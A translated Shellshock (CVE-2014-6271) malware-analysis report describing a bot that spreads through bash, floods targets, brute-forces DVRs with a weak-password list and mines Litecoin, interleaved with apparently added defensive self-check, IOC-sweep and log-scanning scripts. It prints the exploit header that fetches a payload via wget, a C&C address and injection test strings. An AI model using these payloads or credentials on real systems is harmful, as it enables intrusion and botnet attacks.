ShellShock Vulnerability Sample Analysis Report
I. Introduction to the Vulnerability Event
1. Vulnerability Information
● Release time: 48 minutes 04 seconds
● CVE ID: CVE-2014-6271
● Affected version:
2. Vulnerability Overview
Bash (GNU Bourne-Again Shell) is the default shell on most Linux systems and on Mac OS X v10.4. It runs on most Unix-style operating systems and has even been ported to Cygwin on Microsoft Windows, which implements a POSIX interface for Windows.
Bash is so widely used that at least 1.5 million hosts worldwide are affected, and Android and Apple devices in the Linux/Unix world are not spared either.
ShellShock's severity is rated 10 (the highest); the OpenSSL Heartbleed vulnerability from April this year was rated only 5!
3. Vulnerability Cause
Bash 4.3 and earlier versions contain a security vulnerability in the way they process certain specially constructed environment variables. Appending extra strings after a function definition in an environment variable's value triggers the flaw; an attacker can exploit it to change or bypass environment restrictions, execute arbitrary shell commands, and even take complete control of the target system.
The affected environment variables are those whose value begins with a function definition (an exported function). When bash processes such a "function environment variable", it does not stop at the closing "}" of the function body: the shell commands that follow it are executed as well.
4. Vulnerability Testing
(1). CVE-2014-6271 test method:
    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
(2). CVE-2014-7169 test method (still works after the CVE-2014-6271 patch has been applied):
    env X='() { (a)=>\' bash -c "echo date"; cat echo
5. Solution
Watch for security patch updates on the official website.
(1). On Red Hat and CentOS Linux releases, run: yum -y update bash
(2). On Debian Linux releases, run: sudo apt-get update && sudo apt-get install --only-upgrade bash
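The two test commands above can be wrapped into a small self-check that an administrator runs on each host before and after the bash update. The script below is an added example, not part of the original report; the function names, the temporary directory handling and the one-word verdicts are our own, while the two test commands are exactly the ones given in section 4.

```shell
#!/bin/sh
# Added example (not from the original report): checks whether the bash on
# this host is still affected by CVE-2014-6271 / CVE-2014-7169, using the
# report's own test commands. Each check prints one word:
#   vulnerable | patched | bash-not-found

# CVE-2014-6271: an unpatched bash runs the command appended after the
# function body while importing "x"; a patched bash only runs the -c command
# (and usually warns on stderr about the ignored function definition).
check_cve_2014_6271() {
    command -v bash >/dev/null 2>&1 || { echo "bash-not-found"; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# CVE-2014-7169: on an unpatched bash the malformed function definition leaks
# a redirection into the -c command, so "echo date" turns into "date > echo"
# and a file named "echo" appears in the working directory. Run it inside a
# throwaway directory so a vulnerable host does not litter the caller's cwd.
check_cve_2014_7169() {
    command -v bash >/dev/null 2>&1 || { echo "bash-not-found"; return 0; }
    tmp=$(mktemp -d) || { echo "error"; return 1; }
    ( cd "$tmp" && env X='() { (a)=>\' bash -c "echo date" >/dev/null 2>&1 )
    if [ -e "$tmp/echo" ]; then echo "vulnerable"; else echo "patched"; fi
    rm -rf "$tmp"
}

# Combined report; exit status 1 when either check still fires.
shellshock_status() {
    a=$(check_cve_2014_6271)
    b=$(check_cve_2014_7169)
    printf 'CVE-2014-6271: %s\nCVE-2014-7169: %s\n' "$a" "$b"
    case "$a$b" in
        *vulnerable*) echo "verdict: VULNERABLE - update bash now"; return 1 ;;
        *)            echo "verdict: not vulnerable"; return 0 ;;
    esac
}

# Usage: sh shellshock_check.sh --run
if [ "${1:-}" = "--run" ]; then
    shellshock_status
fi
```

Run it once before `yum -y update bash` (or the apt-get equivalent) and once after; the second run should report "patched" for both CVEs. The CVE-2014-7169 check matters because, as the report notes, that bypass still works on a host that only received the first CVE-2014-6271 patch.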
II. Sample Overview
● Sample source:
Since a Linux enthusiast in France disclosed the Bash vulnerability (CVE-2014-6271) on September 24, 2014, malware exploiting it has already appeared on the network. We captured one such sample today and carried out an emergency analysis.
● File information:
File Name: nginx
File Size: 525KB
MD5: 5924bcc045bb7039f55c6ce29234e29a
● Behavior Overview:
This sample spreads by exploiting the Bash vulnerability and uses the Linux shell command wget to download and execute itself. Once running, it collects system information (CPU, network configuration and so on) and then connects to its server. Commands received from the server allow the infected machine to be remotely controlled: it is used to build a botnet for flood attacks and to intrude into a Chinese manufacturer's devices; after the intrusion, its main purpose is mining Litecoin.
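The file information and behaviour above give a responder three indicators to sweep for on a suspect host: the MD5 of the dropped binary, the file names it is written under (the report later shows it being fetched into /tmp/besh and running as "nginx"), and, more generally, any executable sitting in the world-writable scratch directory the dropper uses. The sweep below is an added example and not part of the original report; the MD5 and the two names come from the report, while the function names, the output format and the constructed test directory are our own.

```shell
#!/bin/sh
# Added example (not from the original report): a small IOC sweep for the
# dropper behaviour described above. It walks a directory (normally /tmp,
# where the sample is written as /tmp/besh) and reports files that match
# the report's MD5, carry one of the dropped-file names, or are executable
# at all, which a scratch directory should not normally contain.

SAMPLE_MD5='5924bcc045bb7039f55c6ce29234e29a'   # MD5 given in the report
SAMPLE_NAMES='nginx besh'                        # file name and drop name from the report

# Portable MD5 of one file (md5sum on Linux, md5 on BSD/macOS).
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    elif command -v md5 >/dev/null 2>&1; then
        md5 -q "$1"
    else
        echo "no-md5-tool"
    fi
}

# Prints one line per file: <verdict> <md5> <flags> <path>.
# Verdict is SUSPECT when any indicator fires, otherwise CLEAN.
# The hash is the only strong indicator; name and exec are hunting hints.
sweep_dir() {
    find "$1" -type f | while IFS= read -r f; do
        flags=""
        h=$(file_md5 "$f")
        [ "$h" = "$SAMPLE_MD5" ] && flags="${flags}hash,"
        base=$(basename "$f")
        for n in $SAMPLE_NAMES; do
            [ "$base" = "$n" ] && flags="${flags}name,"
        done
        [ -x "$f" ] && flags="${flags}exec,"
        if [ -n "$flags" ]; then
            echo "SUSPECT $h ${flags%,} $f"
        else
            echo "CLEAN $h - $f"
        fi
    done
}

# Number of SUSPECT lines for a directory, as a single integer.
count_suspects() {
    sweep_dir "$1" | grep -c '^SUSPECT' || true
}

# Builds a constructed test directory (not the real sample): an executable
# named like the dropped file plus a harmless text file. Prints the path.
make_sample_dir() {
    d=$(mktemp -d)
    printf 'constructed stand-in, not the real sample\n' > "$d/nginx"
    chmod 755 "$d/nginx"
    printf 'nothing to see here\n' > "$d/notes.txt"
    chmod 644 "$d/notes.txt"
    echo "$d"
}

# Usage on a live host: sh ioc_sweep.sh --run /tmp
if [ "${1:-}" = "--run" ]; then
    sweep_dir "${2:-/tmp}"
fi
```

On a real host the hash match is the only conclusive hit; a file merely named nginx or an executable in /tmp is a reason to look closer (for example at its network connections to the C&C address given in section III), not a verdict on its own.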
III. Detailed Sample Analysis
1. Sample Propagation Method
The sample propagates through the Bash vulnerability. Exploiting it takes only a few simple lines of commands, which undoubtedly makes things very convenient for the attacker. The code is as follows:
The sample is downloaded and executed through wget. The exploit command is as follows:
    Cookie: () { :;}; wget /tmp/besh http://x.x.x/nginx; chmod 777 /tmp/besh;
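Whatever header the probe is placed in (the Cookie header above, or User-Agent and Referer in other variants), the value that reaches a CGI-exposed bash has to begin with the function-definition marker "() {", and that prefix is what web server logs and captured headers can be scanned for. The script below is an added example and not part of the original report; the regular expression, the function names and the sample access-log lines are all our own constructions.

```shell
#!/bin/sh
# Added example (not from the original report): detection logic for the
# propagation method above. Scans a web server access log for values that
# start with the bash function-import marker "() {" and summarises the hits.

# "()" followed by optional whitespace and "{": the prefix bash looks for
# before importing a function from an environment variable.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Constructed combined-format access log (Referer and User-Agent fields at
# the end): two probe lines from one source, one ordinary request, and one
# decoy that contains "()" but no "{" and must not match.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo probe"
198.51.100.7 - - [25/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:12:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() {:;}; /bin/echo probe" "curl/7.38.0"
192.0.2.9 - - [25/Sep/2014:10:12:09 +0000] "GET /docs/functions().html HTTP/1.1" 404 150 "-" "Mozilla/5.0"'

# Writes the constructed log to a temp file and prints its path.
write_sample_log() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$f"
    echo "$f"
}

# Prints every log line carrying the signature.
scan_shellshock_log() {
    grep -E "$SHELLSHOCK_RE" "$1"
}

# Number of matching lines (grep -c exits 1 on zero hits; not an error here).
count_shellshock_hits() {
    grep -Ec "$SHELLSHOCK_RE" "$1" || true
}

# Distinct source addresses that sent a probe (first field of each hit).
shellshock_sources() {
    grep -E "$SHELLSHOCK_RE" "$1" | awk '{ print $1 }' | sort -u
}

# Usage: sh shellshock_log_scan.sh --run /var/log/apache2/access.log
if [ "${1:-}" = "--run" ]; then
    echo "hits: $(count_shellshock_hits "$2")"
    echo "sources:"
    shellshock_sources "$2"
fi
```

Note that the Cookie header from the report would only show up in an access log if the log format records it; for headers the server does not log, the same pattern is applied at the proxy or IDS layer instead. The decoy line shows why the "{" is part of the signature: a bare "()" is common in ordinary URLs and would flood the result with false positives.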
2. Sample Behavior Analysis
(1). Obtain computer-related information
After the sample starts, it first collects information about the computer, such as the CPU and network configuration.
(2). Connect to its server (89.238.150.154:5)
Attaching strace to the child process created by the sample shows the following behavior:
However, the C&C server was already down.
(3). If the connection to the server succeeds, the infected machine is remotely controlled according to the commands sent by the server. The command set is as follows:
PING, GETLOCALIP, SCANNER, HOLD (DoS flood), JUNK (DoS flood), UDP (DoS flood), TCP (DoS flood), KILLATTK, LOLNOGTFO
● PING
Similar to a heartbeat packet: tests whether the client is successfully connected to the server.
● GETLOCALIP
Sends the local IP address to the server.
● SCANNER
Mainly uses Busybox to parse the string that sets the scan target, then probes the target DVR device to check whether the DVR vulnerability exists and launches an attack.
Parsing the string with busybox gives:
However, in the sample we found that:
The DVR probe mainly tests whether the DVR vulnerability exists. If it does, the sample tries to log into the DVR with weak passwords such as "root" and "12345". If the login succeeds, it runs ps to look for a "cmd.so" process, which is mainly related to Litecoin miners.
The sample therefore uses this method to mine Litecoin.
Weak password list in the program:
root admin user login guest toor changeme 1234 12345 123456 default pass password
● HOLD (DoS Flood)
Carries out a HOLD flood against the target server. The packet received from the server specifies the attack duration in seconds, and the attack time is reported back to the server.
● JUNK (DoS Flood)
Conducts a JUNK flood attack on the target server.
● UDP (DoS Flood)
Conducts a UDP flood attack on the target server.
● TCP (DoS Flood)
Launches a TCP flood attack on the target server.
● KILLATTK
Kills the processes in the list received from the server by calling the kill system call.
● LOLNOGTFO
Invalid instruction in a server packet.
IV. Background Vulnerability Detection
After the vulnerability broke out, we ran a background statistical analysis of related websites nationwide and found the CGI vulnerability on the NAS device management page of one company. Inspecting the page showed devices similar to the "TS-119P"; the device names are of the form TS-XX.
Note: NAS is a network-attached storage device, and many routers now support this function. If such a device is vulnerable, the resources stored on it may be stolen. XXX will reproduce
For this reason, we set up a background page that checks a given website for the Bash vulnerability.
The detection URL is as follows:
http://fish.ijinshan.com/cgibincheck
Unless otherwise stated in the text, please credit the source: FreebuF.COM